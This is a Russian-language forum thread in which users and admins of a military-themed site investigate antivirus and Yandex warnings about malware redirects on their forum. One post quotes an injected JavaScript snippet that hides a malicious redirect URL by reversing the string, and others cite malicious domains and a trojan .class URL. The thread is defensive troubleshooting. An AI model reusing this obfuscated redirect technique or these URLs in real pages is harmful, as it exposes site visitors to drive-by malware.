Здравствуйте, гость ( Вход | Регистрация )

3 Страницы V < 1 2 3 >  
Ответить в эту темуОткрыть новую тему
> Вирус? на форуме?
Радист
сообщение 22.11.2010, 13:39
Сообщение #16


По Горло в Гильзах
***

Группа: Старожил
Сообщений: 773
Регистрация: 23.5.2006
Пользователь №: 399



сегодня аваст опять орёт о вирусе


--------------------
Коли настане день,Закінчиться війна,
Там загубив себе,Побачив аж до дна.
Обійми мене, обійми мене, обійми
Так лагідно і не пускай...
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Noxious
сообщение 22.11.2010, 14:36
Сообщение #17


Вредный Админ
Group Icon

Группа: Админы
Сообщений: 934
Регистрация: 1.12.2005
Из: Москва
Пользователь №: 5



Честно говоря затрудняюсь дать какой либо внятный ответ, на проблему.
Был выкачан весь контенет по фтп, и проверен касперским и нортоном - чисто.
В указанных скринах нет никакого намека на войска типо _http://voiska.ru/forum/index.php и т.п.

Жалуются в основном пользователи аваста, у меня например касперский молчит.

Проблема появляется при заходе на сайт, и я никак не могу связать эти события с нашим форумом...

Я в печали.... mamba.gif moil.gif


--------------------
Еще долго мы будем,
Этой войною дышать.
Захлебываясь тиною будней,
Во сне стонать и стрелять.
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
vovaz02h
сообщение 22.11.2010, 14:48
Сообщение #18


Вояка
****

Группа: Старожил
Сообщений: 1514
Регистрация: 5.12.2005
Пользователь №: 46



Цитата(Радист @ 22.11.2010, 12:39) *
сегодня аваст опять орёт о вирусе


Цитата
ВРЕДОНОСНЫЙ URL-АДРЕС БЛОКИРОВАН (-А)
Для дополнительной информации посетите портал Сообщества avast!.
Объект: kilopamino.com/index11
Заражение: URLMal
Действие: Блокировано
Процесс: C:\Program Files\Opera\opera.exe


После вскрытия (а точнее - поверхностного свежевания) -так, честно говоря, и не понял, что ЭТО kilopamino.com/index11 должно было делать.
Предположительно - создать окно (невидимое ?) не менее 300 на 300 и что-то втянуть в него.

Имею предположение, что оно не в тексте движка форума, а прицепленно, возможно, по ссылкам откуда-то снаружи (баннеры? обменные линки? ... )

Повеселила строка
Код

window.location=url_de("2?igc.ni/moc.onimapolik//:ptth") ...

function url_de(s)
{
    return s.split("").reverse().join("");
}

Ну то есть в коде странички скорее всего прописано именно "2?igc.ni/moc.onimapolik//:ptth", и только на стороне клиента уже в его клиентской джаве оно "легким движением руки" ( function url_de(s){return s.split("").reverse().join("");} ) превращается в kilopamino.com/in.cgi?ну_и_так_далее поэтому искать это на сервере как kilopamino бесполезно ...


( как-то так ... просто мысли в слух ... blush.gif )
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
vovaz02h
сообщение 22.11.2010, 15:09
Сообщение #19


Вояка
****

Группа: Старожил
Сообщений: 1514
Регистрация: 5.12.2005
Пользователь №: 46



Цитата(Noxious @ 22.11.2010, 13:36) *

Был выкачан весь контенет по фтп, и проверен касперским и нортоном - чисто.
Контент, включая шаблоны и sql базу? (не очень знаком с анатомией именно этого движка)

Проверял ли каспер и нортон содержимоме sql файла?

Честно говоря я не знаю, как они обрабатывают sql-файлы (а не игнорят ли вообще как не исполнимые? И есть ли у них в сигнатурах текстовая строка что-то типа url_de("2?igc.ni/moc.onimapolik//:ptth"), например ... и сигнатура ли это для антивируса него а не просто стринг ?... )

Цитата(Noxious @ 22.11.2010, 13:36) *

В указанных скринах нет никакого намека на войска типо _http://voiska.ru/forum/index.php и т.п.

... ну тут есть нюанс.
Аваст не пишет откуда вызывался URL. Он только фиксирует что он заблокировал, без реферера.
(вот бы еще к такой картинке получить и исходный текст странички на момент срабатывания... rolleyes.gif ). Ну типа - обновили страничку, получили срабатывание, и кроме картинки со срабатыванием, например, в той же опере "средства разработчика - исходный код - сохранить как ... " ). Ну типа кроме "покраснело и чешется" - еще и "анализ" ... blush.gif
Но только именно в тот момент, когда сработало.

Цитата(Noxious @ 22.11.2010, 13:36) *
Проблема появляется при заходе на сайт, и я никак не могу связать эти события с нашим форумом...

На сам сайт практически не захожу, 99.% моих заходов сразу на форум.
Некоторое время открывался _ИНОГДА_ AcroReader (совместно с JavaConsole) но вроме бы пофиксили (чуть выше)

Цитата(Noxious @ 22.11.2010, 13:36) *
Я в печали.... mamba.gif moil.gif

... понимаю ... сам такое бываю иногда ...
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Noxious
сообщение 22.11.2010, 15:47
Сообщение #20


Вредный Админ
Group Icon

Группа: Админы
Сообщений: 934
Регистрация: 1.12.2005
Из: Москва
Пользователь №: 5



Цитата
Имею предположение, что оно не в тексте движка форума, а прицепленно, возможно, по ссылкам откуда-то снаружи (баннеры? обменные линки? ... )

Думал, копал, ковырял.... В счетчиках, и рекламе яндекса ничего подобного не нашел, а больше ничего и нет.... даже подписи пользователей шерстил.

Цитата
moc.onimapolik

по тексту нигде не встречается... я про код естественно....

Цитата
Контент, включая шаблоны и sql базу? (не очень знаком с анатомией именно этого движка)

Проверял ли каспер и нортон содержимоме sql файла?


Именно. Ксапер крайняя версия для серверов - все чисто....
Вот за нортон не ручаюсь...



--------------------
Еще долго мы будем,
Этой войною дышать.
Захлебываясь тиною будней,
Во сне стонать и стрелять.
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Радист
сообщение 22.11.2010, 19:08
Сообщение #21


По Горло в Гильзах
***

Группа: Старожил
Сообщений: 773
Регистрация: 23.5.2006
Пользователь №: 399



Сейчас аваст молчит. biggrin.gif


--------------------
Коли настане день,Закінчиться війна,
Там загубив себе,Побачив аж до дна.
Обійми мене, обійми мене, обійми
Так лагідно і не пускай...
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Resistor
сообщение 22.11.2010, 20:06
Сообщение #22


*
Group Icon

Группа: Админы
Сообщений: 973
Регистрация: 1.12.2005
Из: 101 км
Пользователь №: 6



Вирусы тему читают...затаились smile.gif


--------------------
...так кого мы пошлем в разведку-разумееться бабку и дедку- пусть они словно два туриста проползут километров триста -чтоб узнать где стоят ракеты- и какие еще есть секреты...
(с) Про Сидорова Вову
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
vovaz02h
сообщение 22.11.2010, 20:07
Сообщение #23


Вояка
****

Группа: Старожил
Сообщений: 1514
Регистрация: 5.12.2005
Пользователь №: 46



... не, просто спугнули ... ( "поклодь гранату на место" (с) ... wink.gif )

Сообщение отредактировал vovaz02h - 22.11.2010, 20:20
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
vovaz02h
сообщение 23.11.2010, 13:44
Сообщение #24


Вояка
****

Группа: Старожил
Сообщений: 1514
Регистрация: 5.12.2005
Пользователь №: 46



Хм. Дальнейшее препарирование тушек показало...
ну во первых - заблокированный на картинке с первой страницы peepolie.com/index11 оказался одним и тем же что и "свежий" с kilopamino.com/index11

Код
vovaz02h@book-vovaz02h:~$ host kilopamino.com -t A
kilopamino.com has address 194.60.205.251
vovaz02h@book-vovaz02h:~$ host peepolie.com -t A
peepolie.com has address 194.60.205.251
vovaz02h@book-vovaz02h:~$ _

соответственно - все те же эти, но в профиль. Рецидив, так сказать. Теперь бы с профилем разобраться.
Где-нибудь в природе есть что-то похожее на пристойное описание того, как Avast классифицирует вирусы и так далее (наподобие описаний вирусов как на порталах "лабораторий" Касперского и Данилова). Чтобы знать хотя бы примерно что имеется ввиду под URL:Mal (я так подозреваю что имелось ввиду что-то типа "malware over URL"). Единственное вразумительное упоминание URL:Mal на форуме avsoft.ru/forum отправляют на ветку с описанием полного лечения компьютера с использованием альтернативного программаного обеспечения - AVZ, CureIT, HiJackThis.

Есть мнение - таки испросить всех, у кого срабатывал Avast, попробовать проверить комп при помощи действительно таки AVZ , CureIt и ComboFix ... (ну так сказать - контрольная проба).
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Crass
сообщение 9.12.2010, 16:46
Сообщение #25


Вояка
Group Icon

Группа: Модераторы
Сообщений: 1779
Регистрация: 3.12.2005
Из: Подмосковье
Пользователь №: 28



Только что при попытке зайти в ветку славянский союз выругался касперский на "заргузку объекта, содержащего троянскую программу":

http://zebuqud.co.cc/awstats/05d65b0e148dc...e1d6da730.class


--------------------
Во всех непонятных ситуациях используй ЗУ-23-2
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
гадёныш
сообщение 9.12.2010, 17:49
Сообщение #26


werewolf
****

Группа: Старожил
Сообщений: 1037
Регистрация: 27.12.2007
Из: Москва-400
Пользователь №: 2923



5 Avast, firefox 3,6 - ни разу не было никаких ругательств... Я, честно говоря, сначала подумал что вы прикалываетесь...

Цитата

Форвардит на гугл.ру , аваст не ругается smile.gif


--------------------
Ты помнишь, Брат Серёга, опасной шли дорогой,
Как кровью побратались мы в Чечне,
Как вечером морозным, мы на заборе в Грозном
Вдвоём писали "СЛАВА ВДВ"
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
проверка
сообщение 19.1.2011, 21:27
Сообщение #27


По Горло в Гильзах
***

Группа: Старожил
Сообщений: 740
Регистрация: 2.12.2005
Пользователь №: 25



Это или паранойя или каждый раз вылазит енто
Сайт

только меняются буквавки и цифравки перед .co.cc

Сообщение отредактировал проверка - 19.1.2011, 21:30
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Волк
сообщение 19.1.2011, 22:34
Сообщение #28


Оборотень
*****

Группа: Старожил
Сообщений: 5252
Регистрация: 8.12.2005
Пользователь №: 77



Открой доступ к оригиналу, а то ни фига толком не видно.


--------------------
Homo homini lupus est
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
проверка
сообщение 20.1.2011, 18:55
Сообщение #29


По Горло в Гильзах
***

Группа: Старожил
Сообщений: 740
Регистрация: 2.12.2005
Пользователь №: 25



Открыл
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения
Дедок
сообщение 30.1.2011, 20:38
Сообщение #30


По Пузо в Гильзах
**

Группа: Старожил
Сообщений: 339
Регистрация: 4.1.2008
Из: Подмосковье
Пользователь №: 2971



Уже начинает надоедать. Не только Аваст, но и Яндекс предупреждает:

Изображение
Это не фотомонтаж. Попробуйте сами открыть эту страницу: http://yandex.ru/infected?url=http%3A%2F%2...ect&l10n=ru
Далее: антиреклама форума от Яндекса:
Изображение

Сообщение отредактировал Дедок - 30.1.2011, 20:38
Пользователь в офлайнеКарточка пользователяОтправить личное сообщение
Вернуться в начало страницы
+Ответить с цитированием данного сообщения

3 Страницы V < 1 2 3 >
Ответить в эту темуОткрыть новую тему
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0

 

- Текстовая версия Сейчас: 29.3.2024, 4:10
 
     

Яндекс цитирования хостинг от .masterhost